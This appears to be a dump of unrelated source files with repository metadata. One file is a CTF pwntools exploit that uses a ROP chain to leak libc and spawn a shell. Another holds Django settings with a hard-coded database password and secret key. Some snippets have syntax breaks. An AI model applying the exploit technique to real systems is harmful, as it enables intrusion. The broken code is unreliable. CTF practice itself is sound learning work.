TestHand("S:T9732 H:J86 D:K93 C:86", 1, 0, 0, 4, 1, 5, 10),
TestHand("S:KT8 H:94 D:AJT4 C:6532", 1, 0, 0, 8, 1, 9, 9),
TestHand("S:AQT92 H:J763 D:763 C:6", 0, 1, 0, 7, 2, 9, 8),
TestHand("S:AK94 H:K743 D:AKT C:72", 1, 0, 0, 17, 1, 18, 6),
TestHand("S:A974 D:AK94 C:QJ932", 0, 0, 1, 14, 3, 17, 5),
TestHand("S:J873 H:KJ62 D:A96 C:K8", 1, 0, 0, 12, 1, 13, 8),
TestHand("S:T732 H:T2 D:JT8 C:AK96", 1, 0, 0, 8, 1, 9, 9),
TestHand("S:KT H:AK975 D:QJT2 C:KJ", 2, 0, 0, 17, 2, 19, 5),
TestHand("S:KJT97 H:AQ843 D:86 C:5", 1, 1, 0, 10, 3, 13, 6)
]
class BridgeHand:
    """A 13-card bridge hand with standard evaluation metrics (HCP, SSP, LTC)."""
    def __init__(self, cards: typing.Sequence[Card]):
        """
        Process and store the sequence of Card objects passed in input.
        Raise TypeError if not a sequence
        Raise ValueError if any element of the sequence is not an instance
        of Card, or if the number of elements is not 13
        """
        if not isinstance(cards, Sequence):
            raise TypeError("BridgeHand object must be initiated with card sequence")
        elif len(cards) != 13:
            raise ValueError("Card sequence must have 13 cards")
        elif not all(isinstance(x, Card) for x in cards):
            raise ValueError("Card sequence can have only card objects")
        else:
            self.cards = cards
    def __str__(self) -> str:
        """
        Return a string representing this hand, in the following format:
        "S:AK3 H:T987 D:KJ98 C:QJ"
        List the suits in SHDC order, and the cards within each suit in
        AKQJT..2 order.
        Separate the suit symbol from its cards with a colon, and
        the suits with a single space.
        Note that a "10" should be represented with a capital 'T'
        """
        ret = ''
        # Group rank names by suit name, then emit suits/ranks in enum order.
        ret_dict = defaultdict(list)
        for c in self.cards:
            ret_dict[str(c.suit.name)].append(str(c.rank.name))
        for s in sorted(ret_dict, key=lambda x: Suit[x].value):
            ret += "{}:{} ".format(s, ''.join(sorted(ret_dict[s], key=lambda x: Rank[x].value)))
        return "{}".format(ret.strip())
    @property
    def hcp(self) -> int:
        """ Return the number of high card points contained in this hand """
        # A=4, K=3, Q=2, J=1, parsed from the canonical string form.
        # NOTE(review): the module-level HCP table defines the same values but
        # is not used here.
        hcp = 0
        for suit_holding in self.__str__().split():
            for c in suit_holding.strip().split(':')[1]:
                if c == 'A':
                    hcp += 4
                if c == 'K':
                    hcp += 3
                if c == 'Q':
                    hcp += 2
                if c == 'J':
                    hcp += 1
        return hcp
    @property
    def doubletons(self) -> int:
        """ Return the number of doubletons contained in this hand """
        doubletons = 0
        for suit_holding in self.__str__().split():
            if len(suit_holding.strip().split(':')[1]) == 2:
                doubletons += 1
        return doubletons
    @property
    def singletons(self) -> int:
        """ Return the number of singletons contained in this hand """
        singletons = 0
        for suit_holding in self.__str__().split():
            if len(suit_holding.strip().split(':')[1]) == 1:
                singletons += 1
        return singletons
    @property
    def voids(self) -> int:
        """ Return the number of voids (missing suits) contained in
        this hand
        """
        # A suit with no cards never appears in the string form, so the void
        # count is 4 minus the number of suits actually present.
        non_voids = 0
        for suit_holding in self.__str__().split():
            non_voids += 1
        return 4 - non_voids
    @property
    def ssp(self) -> int:
        """ Return the number of short suit points in this hand.
        Doubletons are worth one point, singletons two points,
        voids 3 points
        """
        return self.doubletons * 1 + self.singletons * 2 + self.voids * 3
    @property
    def total_points(self) -> int:
        """ Return the total points (hcp and ssp) contained in this hand """
        return self.hcp + self.ssp
    @property
    def ltc(self) -> int:
        """ Return the losing trick count for this hand - see bite description
        for the procedure
        """
        ltc = 0
        for suit_holding in self.__str__().split():
            # singletons: any lone card other than the ace is one loser
            if len(suit_holding.strip().split(':')[1]) == 1:
                for c in suit_holding.strip().split(':')[1]:
                    if c == 'A':
                        ltc += 0
                    else:
                        ltc += 1
            # doubletons: AK=0, Ax/Kx=1, anything else=2 losers
            if len(suit_holding.strip().split(':')[1]) == 2:
                d_cards = suit_holding.strip().split(':')[1]
                if d_cards == 'AK':
                    ltc += 0
                elif d_cards[0] == 'A' or d_cards[0] == 'K':
                    ltc += 1
                elif d_cards[0] == 'Q':
                    ltc += 2
                else:
                    ltc += 2
            # 3+ card suit: only the top three cards can be losers
            if len(suit_holding.strip().split(':')[1]) >= 3:
                t_cards = suit_holding.strip().split(':')[1][:3]
                if t_cards == 'AKQ':
                    ltc += 0
                elif t_cards[:2] == 'AK' or t_cards[:2] == 'AQ' or t_cards[:2] == 'KQ':
                    ltc += 1
                elif t_cards[0] == 'A' or t_cards[0] == 'K' or t_cards[0] == 'Q':
                    ltc += 2
                else:
                    ltc += 3
return ltc
| [
"nhegde@netflix.com"
] | nhegde@netflix.com |
f60397de642e3f12a66fcdec6cae5c94fd5de495 | 7185ae54efb2ce9ecd4bd9c53057053f6e799ae3 | /PWN/some/2019年7月17日-pwn-(水+ok+cpp)/pwn02/pwn2exp.py | 24a3645e72b65dccd0dcc3936b7502a14b8fcc14 | [] | no_license | 0xFF1E071F/CTFchallenge | 1b259c3f7cf8f7a1c20ea38cadd8f170bff137d1 | 12bb31a202b6110c05758fc4d57cfb58c98d9f23 | refs/heads/master | 2022-04-07T03:34:46.241887 | 2020-03-02T00:22:37 | 2020-03-02T00:22:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 766 | py | from pwn import *
context.log_level = 'debug'
p = process("./pwn02")
e = ELF("./pwn02")
p.recvuntil("time?\n")
p.sendline("134520896")
p.recvuntil("time?\n")
p.sendline('10000')
pop_ret = 0x0804898b
ppp_ret = 0x08048989
addr = 0x0804A058
payload = '1234' * 8
payload += p32(e.plt['read']) + p32(ppp_ret) + p32(0) + p32(addr) + p32(
4) + p32(0x080486FD)
p.recvuntil("ASLR\n")
p.sendline(payload)
p.sendline(p32(e.got['putchar']))
p.recvuntil("time?\n")
p.sendline("134520896")
p.recvuntil("time?\n")
p.sendline('10000')
p.recvuntil('\x0a')
libc_base = u32(p.recv(4)) - 0x60da0
libc_system = libc_base + 0x3a940
libc_binsh = libc_base + 0x15902b
payload = '1234' * 8
payload += p32(libc_system) + p32(pop_ret) + p32(libc_binsh)
p.sendline(payload)
p.interactive()
| [
"mozhaohua1999@outlook.com"
] | mozhaohua1999@outlook.com |
fd1fcb904335972d230abf0e0b9f8fa1588452ca | 695c1667d2b2b57ccb526cc2817bbe5c4038de5c | /navigator/src/plan.py | 24dac9a6c5d361b969b4178a7bd74b3b55573e2d | [] | no_license | Avinash-1501/cse550 | a6f18e2f84fd47595af994aa81b95fc20e9a311e | 36037193af4c7ac2af282471a66c064af3c6a0f4 | refs/heads/master | 2021-05-29T06:40:56.356026 | 2015-04-29T19:26:18 | 2015-04-29T19:26:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,668 | py | #!/usr/bin/python
import roslib; roslib.load_manifest('navigator')
from assignment05.path_planning import *
from navigator import *
# Parse Args
parser = argparse.ArgumentParser(description='Path Plan')
parser.add_argument('mapbag')
args = parser.parse_args(rospy.myargv()[1:])
# Get Data From Bag Files
the_map = get_dict( args.mapbag )['/map']
rospy.init_node('path_plan')
mpub = rospy.Publisher('/map', OccupancyGrid, latch=True)
mpub.publish(the_map)
ppub = rospy.Publisher('/start_pose', PoseStamped, latch=True)
path_pub = rospy.Publisher('/path', Path)
start_pose = None
goal_pose = None
def plan():
    """Plan a grid path from start_pose to goal_pose and publish it on /path."""
    # Nothing to do until both endpoints have been received.
    if start_pose is None or goal_pose is None:
        return
    # Convert the world-frame start/goal coordinates into map grid cells.
    result = to_grid2(start_pose[0],start_pose[1], the_map)
    if not result:
        print "INVALID START POSE"
        return
    else:
        sx, sy = result
    result = to_grid2(goal_pose[0],goal_pose[1], the_map)
    if not result:
        print "INVALID GOAL POSE"
        return
    else:
        gx, gy = result
    X = plan_path(sx, sy, gx, gy, the_map)
    if X:
        path_pub.publish(to_path(X, the_map))
    else:
        print "NO PATH"
def goal_sub(msg):
    """Callback for /goal_pose: record the new goal and re-plan."""
    global goal_pose
    goal_pose = to_tuple(msg.pose.position, msg.pose.orientation)
    plan()
def start_sub(msg):
    """Callback for /initialpose: record the start, echo it on /start_pose, re-plan."""
    global start_pose
    start_pose = to_tuple(msg.pose.pose.position, msg.pose.pose.orientation)
    ps = PoseStamped()
    ps.header = msg.header
    ps.pose = apply(to_pose, start_pose)  # Python 2 apply(): to_pose(*start_pose)
    ppub.publish(ps)
    plan()
sub = rospy.Subscriber('/goal_pose', PoseStamped, goal_sub)
sub2 = rospy.Subscriber('/initialpose', PoseWithCovarianceStamped, start_sub)
rospy.spin()
| [
"davidvlu@gmail.com"
] | davidvlu@gmail.com |
b59d20addda1b62a145dcbfe767a7c76a7c061be | ad4c2aa0398406ccb7e70562560e75fa283ffa1a | /sum-of-left-leaves/sum-of-left-leaves.py | e9eb62561a866708b2384dbdd88bb0c50858d9ac | [
"Apache-2.0"
] | permissive | kmgowda/kmg-leetcode-python | 427d58f1750735618dfd51936d33240df5ba9ace | 4d32e110ac33563a8bde3fd3200d5804db354d95 | refs/heads/main | 2023-08-22T06:59:43.141131 | 2021-10-16T14:04:32 | 2021-10-16T14:04:32 | 417,841,590 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 746 | py | // https://leetcode.com/problems/sum-of-left-leaves
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
    def sumOfLeftLeaves(self, root):
        """
        Return the sum of the values of all *left* leaves in the tree.

        :type root: TreeNode
        :rtype: int
        """
        self.total = 0  # accumulator shared with the nested helper via self
        def sumLeftleaf(root, isleft):
            # Depth-first walk; isleft records whether this node is a left child.
            if root:
                if not root.left and not root.right:
                    if isleft:
                        self.total+=root.val
                sumLeftleaf(root.left, True)
                sumLeftleaf(root.right, False)
        sumLeftleaf(root, False)
return self.total | [
"keshava.gowda@gmail.com"
] | keshava.gowda@gmail.com |
1105ec0b1ddb15924ebfc28ab85fa00d3efaa6f1 | 6baab869e16ed7cafdea7e0e68f27b7e0fc1c2ee | /demo_class/demo_5.py | 7feb701538b28b26283d5f7e1471c99811bbe084 | [] | no_license | SkewwG/Python_demo | ad4bd81207619bff23498b41833bc45695eab164 | 9357645287cc49d3396bd65062b71ac646076979 | refs/heads/master | 2021-05-03T05:21:56.685496 | 2018-07-06T00:02:59 | 2018-07-06T00:02:59 | 120,637,210 | 8 | 2 | null | null | null | null | UTF-8 | Python | false | false | 169 | py | def demo_yield(n):
    """Generator that counts down from n to 1, printing trace messages around each yield."""
    print('cunting')  # NOTE(review): typo for "counting" — runtime string left unchanged
    while n > 0:
        print('before')
        yield n  # execution pauses here until the next __next__() call
        n -= 1
print('afeter')
print(demo_yield(5).__next__()) | [
"446106525@qq.com"
] | 446106525@qq.com |
43fa50129b5df8f91bad45446acac3e2c063f1d9 | ef6229d281edecbea3faad37830cb1d452d03e5b | /ucsmsdk/mometa/extpol/ExtpolControllerCont.py | ae30d6ff188351082a4f0e1dd925a6370910ef71 | [
"Apache-2.0"
] | permissive | anoop1984/python_sdk | 0809be78de32350acc40701d6207631322851010 | c4a226bad5e10ad233eda62bc8f6d66a5a82b651 | refs/heads/master | 2020-12-31T00:18:57.415950 | 2016-04-26T17:39:38 | 2016-04-26T17:39:38 | 57,148,449 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,257 | py | """This module contains the general information for ExtpolControllerCont ManagedObject."""
import sys, os
from ...ucsmo import ManagedObject
from ...ucscoremeta import UcsVersion, MoPropertyMeta, MoMeta
from ...ucsmeta import VersionMeta
class ExtpolControllerContConsts():
pass
class ExtpolControllerCont(ManagedObject):
"""This is ExtpolControllerCont class."""
consts = ExtpolControllerContConsts()
naming_props = set([])
mo_meta = MoMeta("ExtpolControllerCont", "extpolControllerCont", "controllers", VersionMeta.Version211a, "InputOutput", 0x1f, [], ["admin"], [u'extpolRegistry'], [u'extpolController'], ["Get"])
prop_meta = {
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version211a, MoPropertyMeta.INTERNAL, 0x2, None, None, r"""((deleteAll|ignore|deleteNonPresent),){0,2}(deleteAll|ignore|deleteNonPresent){0,1}""", [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, 0x4, 0, 256, None, [], []),
"gen_num": MoPropertyMeta("gen_num", "genNum", "uint", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, 0x8, 0, 256, None, [], []),
"sacl": MoPropertyMeta("sacl", "sacl", "string", VersionMeta.Version302a, MoPropertyMeta.READ_ONLY, None, None, None, r"""((none|del|mod|addchild|cascade),){0,4}(none|del|mod|addchild|cascade){0,1}""", [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version211a, MoPropertyMeta.READ_WRITE, 0x10, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []),
}
prop_map = {
"childAction": "child_action",
"dn": "dn",
"genNum": "gen_num",
"rn": "rn",
"sacl": "sacl",
"status": "status",
}
    def __init__(self, parent_mo_or_dn, **kwargs):
        """Create an ExtpolControllerCont managed object under *parent_mo_or_dn*."""
        self._dirty_mask = 0
        self.child_action = None  # properties mirrored from prop_meta, unset until read/assigned
        self.gen_num = None
        self.sacl = None
        self.status = None
        ManagedObject.__init__(self, "ExtpolControllerCont", parent_mo_or_dn, **kwargs)
| [
"test@cisco.com"
] | test@cisco.com |
5c2f4032248c9ab25d6bf54b79381af856bb74b5 | 759c447b4cc7105096983eadb87d667ae472d6c0 | /acme_diags/plot/colormaps/rewrite_from_colorcet.py | fa6946bff0a7c3ea3f15a0ac5cbcc5d39bfc6ac5 | [
"BSD-3-Clause"
] | permissive | kaabre/acme_diags | cd41014ee0f023eb8796c1ac414615be0fe99f53 | 40364724ce46f1e5ec91201764da1de593a1a5f0 | refs/heads/master | 2021-05-14T17:32:19.577633 | 2018-02-09T20:29:49 | 2018-02-09T20:29:49 | 116,049,920 | 0 | 0 | null | 2018-01-02T19:34:12 | 2018-01-02T19:34:12 | null | UTF-8 | Python | false | false | 763 | py | try:
import colorcet
except BaseException:
print "Cannot convert from colorcet w/o colorcet"
import sys
sys.exit()
all_cms = colorcet.cm
def dump_cmap(name, mpl_cmap):
    """Write a matplotlib colormap out as a 'cet_<name>.rgb' color-table file."""
    nm = "cet_%s" % name
    with open("%s.rgb" % nm, "w") as f:
        f.write("# Converted from colorcet\n")
        f.write("#\n")
        f.write("# number of colors in table\n")
        f.write("#ncolors = %i\n" % mpl_cmap.N)
        f.write("#\n")
        f.write("# r g b\n")
        for i in range(mpl_cmap.N):
            # Sample the colormap at evenly spaced positions in [0, 1].
            a = float(i) / float(mpl_cmap.N - 1)
            # NOTE: 'a' is reused — after this line it holds the alpha channel,
            # not the sample position (harmless, but easy to misread).
            r, g, b, a = [int(x * 255) for x in mpl_cmap(a)]
            f.write(" %3s %3s %3s\n" % (r, g, b))
    print "Wrote %s" % nm
for cmap in all_cms.keys():
dump_cmap(cmap, all_cms[cmap])
| [
"doutriaux1@llnl.gov"
] | doutriaux1@llnl.gov |
d74f5f77d2d099686d4658eabd6ee585ea46da9f | 4ad0dddd7a6e29b31d5780bf6dec6ebad776cf73 | /SimG4CMS/HGCalTestBeam/test/HGCalTBCERN170_cfg.py | d30e37913859424152ef656058b1ddaa63fd7e67 | [
"Apache-2.0"
] | permissive | llechner/cmssw | 95dcd6ae0ced5546853778c6ebdf0dd224030215 | 419d33be023f9f2a4c56ef4b851552d2d228600a | refs/heads/master | 2020-08-26T20:20:28.940065 | 2018-10-18T09:24:51 | 2018-10-18T09:24:51 | 131,112,577 | 0 | 0 | Apache-2.0 | 2019-10-23T17:59:17 | 2018-04-26T06:51:19 | C++ | UTF-8 | Python | false | false | 4,988 | py | import FWCore.ParameterSet.Config as cms
process = cms.Process('SIM')
# import of standard configurations
process.load("FWCore.MessageService.MessageLogger_cfi")
process.load('Configuration.StandardSequences.Services_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('Configuration.EventContent.EventContent_cff')
process.load('SimGeneral.MixingModule.mixNoPU_cfi')
process.load('SimG4CMS.HGCalTestBeam.HGCalTB170JulyXML_cfi')
process.load('Geometry.HGCalCommonData.hgcalNumberingInitialization_cfi')
process.load('Geometry.HGCalCommonData.hgcalParametersInitialization_cfi')
process.load('Configuration.StandardSequences.MagneticField_0T_cff')
process.load('Configuration.StandardSequences.Generator_cff')
process.load('IOMC.EventVertexGenerators.VtxSmearedFlat_cfi')
process.load('GeneratorInterface.Core.genFilterSummary_cff')
process.load('Configuration.StandardSequences.SimIdeal_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.load('SimG4CMS.HGCalTestBeam.HGCalTBCheckGunPosition_cfi')
process.load('SimG4CMS.HGCalTestBeam.HGCalTBAnalyzer_cfi')
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(10)
)
if 'MessageLogger' in process.__dict__:
process.MessageLogger.categories.append('HGCSim')
process.MessageLogger.categories.append('HcalSim')
# Input source
process.source = cms.Source("EmptySource")
process.options = cms.untracked.PSet(
)
# Production Info
process.configurationMetadata = cms.untracked.PSet(
annotation = cms.untracked.string('SingleMuonE200_cfi nevts:10'),
name = cms.untracked.string('Applications'),
version = cms.untracked.string('$Revision: 1.19 $')
)
# Output definition
process.RAWSIMoutput = cms.OutputModule("PoolOutputModule",
SelectEvents = cms.untracked.PSet(
SelectEvents = cms.vstring('generation_step')
),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('GEN-SIM'),
filterName = cms.untracked.string('')
),
eventAutoFlushCompressedSize = cms.untracked.int32(5242880),
fileName = cms.untracked.string('file:gensim.root'),
outputCommands = process.RAWSIMEventContent.outputCommands,
splitLevel = cms.untracked.int32(0)
)
# Additional output definition
process.TFileService = cms.Service("TFileService",
fileName = cms.string('TBGenSim.root')
)
# Other statements
process.genstepfilter.triggerConditions=cms.vstring("generation_step")
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, 'auto:run2_mc', '')
# Particle gun: single muons (PDG id 13) at ~100 GeV, theta fixed at 0,
# phi uniform over the full circle.
process.generator = cms.EDProducer("FlatRandomEThetaGunProducer",
    AddAntiParticle = cms.bool(False),
    PGunParameters = cms.PSet(
        MinE = cms.double(99.99),   # energy window is effectively a delta at 100 GeV
        MaxE = cms.double(100.01),
        MinTheta = cms.double(0.0),
        MaxTheta = cms.double(0.0),
        MinPhi = cms.double(-3.14159265359),
        MaxPhi = cms.double(3.14159265359),
        PartID = cms.vint32(13)
    ),
    Verbosity = cms.untracked.int32(0),
    firstRun = cms.untracked.uint32(1),
    psethack = cms.string('single muon E 100')
)
process.VtxSmeared.MinZ = -800.0
process.VtxSmeared.MaxZ = -800.0
process.VtxSmeared.MinX = -7.5
process.VtxSmeared.MaxX = 7.5
process.VtxSmeared.MinY = -7.5
process.VtxSmeared.MaxY = 7.5
process.g4SimHits.HGCSD.RejectMouseBite = True
process.g4SimHits.HGCSD.RotatedWafer = True
process.g4SimHits.Watchers = cms.VPSet(cms.PSet(
HGCPassive = cms.PSet(
LVNames = cms.vstring('HGCalEE','HGCalHE','HGCalAH', 'CMSE'),
MotherName = cms.string('CMSE'),
),
type = cms.string('HGCPassive'),
)
)
process.HGCalTBAnalyzer.DoDigis = False
process.HGCalTBAnalyzer.DoRecHits = False
process.HGCalTBAnalyzer.UseFH = True
process.HGCalTBAnalyzer.UseBH = True
process.HGCalTBAnalyzer.UseBeam = True
process.HGCalTBAnalyzer.ZFrontEE = 1110.0
process.HGCalTBAnalyzer.ZFrontFH = 1172.3
process.HGCalTBAnalyzer.DoPassive = True
# Path and EndPath definitions
process.generation_step = cms.Path(process.pgen)
process.gunfilter_step = cms.Path(process.HGCalTBCheckGunPostion)
process.simulation_step = cms.Path(process.psim)
process.genfiltersummary_step = cms.EndPath(process.genFilterSummary)
process.analysis_step = cms.Path(process.HGCalTBAnalyzer)
process.endjob_step = cms.EndPath(process.endOfProcess)
process.RAWSIMoutput_step = cms.EndPath(process.RAWSIMoutput)
# Schedule definition
process.schedule = cms.Schedule(process.generation_step,
process.genfiltersummary_step,
process.simulation_step,
process.gunfilter_step,
process.analysis_step,
process.endjob_step,
process.RAWSIMoutput_step,
)
# filter all path with the production filter sequence
for path in process.paths:
getattr(process,path)._seq = process.generator * getattr(process,path)._seq
| [
"sunanda.banerjee@cern.ch"
] | sunanda.banerjee@cern.ch |
258ba757b7cd1250e8a2e1abe6391c275e180530 | 719fb168fdace7548c719a6d998b71bb15525d6c | /src/kinya/settings.py | baffe196271147d4a3a1787b16e0169cf7139ce7 | [] | no_license | nicpottier/kinya | 858b19f9d8891c4be80d8ecce477fbfd5c747a8e | e3f9ee774fcb00f916911df986f61e8f8a78f188 | refs/heads/master | 2016-09-05T21:18:03.141403 | 2011-05-23T18:19:20 | 2011-05-23T18:19:20 | 783,631 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,117 | py | # Django settings for kinya project.
import os
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('Nicolas Pottier', 'nicp@nyaruka.com'),
)
MANAGERS = ADMINS
# NOTE(review): database credentials are hard-coded in source; move them to
# environment variables or a local settings override before deploying.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.mysql',
        'NAME': 'kinya',
        'USER': 'kinya', # Not used with sqlite3.
        'PASSWORD': 'murakoze', # Not used with sqlite3.
        'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
        'PORT': '', # Set to empty string for default. Not used with sqlite3.
    }
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../static')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = '/static/'
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/media/'
# Make this unique, and don't share it with anybody.
SECRET_KEY = 's7=@35q5k6wzfmrhn7=1l27s$z&0k&dawsuu65q2)i*^tb3rkvasdf'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'kinya.urls'
TEMPLATE_DIRS = (
os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../templates')
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.admin',
'kinya.lessons',
)
| [
"nicpottier@gmail.com"
] | nicpottier@gmail.com |
453465980126de4e0addd9466aa1fb4eb7709d95 | 452b8b849e080cda5a26f4018cafa5a674ff7c20 | /froide/account/migrations/0003_auto_20160125_2127.py | 284973b0045128333fd564ec7053b4d1ea74536a | [
"MIT"
] | permissive | okffi/tietopyynto | 1262dcaf748c41b49be4a774be552fc75fc9b336 | 66b7e7dbf3c3395d79af3da85b3b58f01fad62dc | refs/heads/tietopyynto | 2021-01-17T21:07:04.829856 | 2016-10-30T19:26:53 | 2016-10-30T19:26:53 | 14,255,294 | 3 | 2 | MIT | 2021-01-05T11:51:18 | 2013-11-09T10:19:16 | Python | UTF-8 | Python | false | false | 688 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Add soft-deletion fields (``date_left``, ``is_deleted``) to the User model."""
    # Must run after the previous account-app migration.
    dependencies = [
        ('account', '0002_auto_20150729_0828'),
    ]
    operations = [
        migrations.AddField(
            model_name='user',
            name='date_left',
            field=models.DateTimeField(default=None, null=True, verbose_name='date left', blank=True),
        ),
        migrations.AddField(
            model_name='user',
            name='is_deleted',
            field=models.BooleanField(default=False, help_text='Designates whether this user was deleted.', verbose_name='deleted'),
        ),
    ]
| [
"mail@stefanwehrmeyer.com"
] | mail@stefanwehrmeyer.com |
6f40c592f87d09d6a2d046b25fabd3e80395a695 | 118984fdbacf5eb71159eb511ccd055987498886 | /CH11/EX11.38.py | a2c179da5ac2a5a4bd3de019820e3260ddb8588a | [] | no_license | 6igsm0ke/Introduction-to-Programming-Using-Python-Liang-1st-edtion | 321c6256be6ff78adbc8e3ddc73f2f43a51a75ab | 159489f3af296f87469ddddf3a1cb232917506b0 | refs/heads/master | 2023-06-05T20:03:17.951911 | 2021-06-18T18:04:42 | 2021-06-18T18:04:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,372 | py | # 11.38 (Turtle: draw a polygon/polyline) Write the following functions that draw a
# polygon/polyline to connect all points in the list. Each element in the list is a list of
# two coordinates.
# # Draw a polyline to connect all the points in the list
# def drawPolyline(points):
# # Draw a polygon to connect all the points in the list and
# # close the polygon by connecting the first point with the last point
# def drawPolygon(points):
# # Fill a polygon by connecting all the points in the list
# def fillPolygon(points):
import turtle
# Draw a polyline to connect all the points in the list
def drawPolyline(points):
    """Draw connected line segments through every point in the list.

    Each element of ``points`` is an (x, y) pair.
    """
    for i in range(len(points) - 1):
        # Bug fix: drawLine takes four coordinates, but the original passed
        # the two point pairs directly (drawLine(points[i], points[i+1])),
        # which raised a TypeError.  Unpack each pair instead.
        x1, y1 = points[i]
        x2, y2 = points[i + 1]
        drawLine(x1, y1, x2, y2)
# Draw a polygon to connect all the points in the list and
# close the polygon by connecting the first point with the last point
def drawPolygon(points):
    """Draw a closed polygon: a polyline through all points plus a closing edge."""
    drawPolyline(points)
    # Bug fix: unpack the endpoints — drawLine expects four coordinates,
    # not two point pairs.
    x1, y1 = points[len(points) - 1]
    x2, y2 = points[0]
    drawLine(x1, y1, x2, y2)  # Close the polygon
# Fill a polygon by connecting all the points in the list
def fillPolygon(points):
    # Fill the polygon's interior: everything drawn between begin_fill()
    # and end_fill() is filled with the turtle's current fill color.
    turtle.begin_fill()
    drawPolygon(points)
    turtle.end_fill()
# Draw a line from (x1, y1) to (x2, y2)
def drawLine(x1, y1, x2, y2):
    # Lift the pen so moving to the start point leaves no trace.
    turtle.penup()
    turtle.goto(x1, y1)
    # Lower the pen, then draw the segment to the end point.
    turtle.pendown()
    turtle.goto(x2, y2)
# SECURITY NOTE(review): eval() executes arbitrary Python typed by the user;
# ast.literal_eval would be a safer way to parse "(x, y)" tokens.
points = input("Enter points: ").split()
# Each whitespace-separated token is expected to evaluate to an (x, y) pair.
points = [eval(p) for p in points]
drawPolygon(points)
"47993441+OmarAlmighty@users.noreply.github.com"
] | 47993441+OmarAlmighty@users.noreply.github.com |
10662b2839c963e9c42342a502361677ede604d6 | 104a0ec7cfb5d4bf948f22b47edb59122a886363 | /input/kinetics/families/intra_substitutionCS_cyclization/depository.py | d3a115a1158e51d03bfd7a044c1ccccb5d030255 | [] | no_license | nickvandewiele/RMG-database | 3afbe88df46a5641c6abbaf032bf4a0b6b9aae73 | dc3cbc7048501d730062426a65d87ea452e8705f | refs/heads/master | 2020-12-25T08:19:49.436773 | 2014-08-04T21:37:26 | 2014-08-04T21:37:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 131 | py | #!/usr/bin/env python
# encoding: utf-8
# Registry identifier and (empty) descriptions for this kinetics depository
# within the RMG-database family "intra_substitutionCS_cyclization".
name = "intra_substitutionCS_cyclization/depository"
shortDesc = u""
longDesc = u"""
"""
| [
"jwallen@mit.edu"
] | jwallen@mit.edu |
4b18e558dc27eafa6c869c000bf0f0e6270df667 | 19d47d47c9614dddcf2f8d744d883a90ade0ce82 | /pynsxt/swagger_client/models/lb_source_ip_persistence_profile.py | 3b76026eb4c6d08312a91366ab687f7d0bcdcb0c | [] | no_license | darshanhuang1/pynsxt-1 | 9ed7c0da9b3a64e837a26cbbd8b228e811cee823 | fb1091dff1af7f8b8f01aec715682dea60765eb8 | refs/heads/master | 2020-05-25T14:51:09.932853 | 2018-05-16T12:43:48 | 2018-05-16T12:43:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,200 | py | # coding: utf-8
"""
NSX API
VMware NSX REST API # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from swagger_client.models.lb_persistence_profile import LbPersistenceProfile # noqa: F401,E501
from swagger_client.models.resource_link import ResourceLink # noqa: F401,E501
from swagger_client.models.self_resource_link import SelfResourceLink # noqa: F401,E501
